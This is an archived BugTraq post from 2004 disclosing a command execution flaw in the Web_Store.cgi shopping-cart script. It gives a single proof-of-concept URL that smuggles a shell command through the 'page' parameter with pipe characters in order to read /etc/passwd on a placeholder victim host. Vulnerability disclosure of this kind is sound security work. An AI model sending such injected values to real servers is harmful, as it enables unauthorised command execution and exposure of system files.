BugTraq
Web_Store.cgi allows Command Execution Jul 17 2004 03:05PM
Zero_X www.lobnan.de Team (zero-x linuxmail org)


Web_Store.cgi allows Command Execution:

This application was written by Selena Sol and Gunther Birznieks.

You can execute shellcommands:

http://www.victim.com/cgi-bin/web_store.cgi?page=.html|cat /etc/passwd|

Zero X, member of www.Lobnan.de and www.Lostkey.org

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus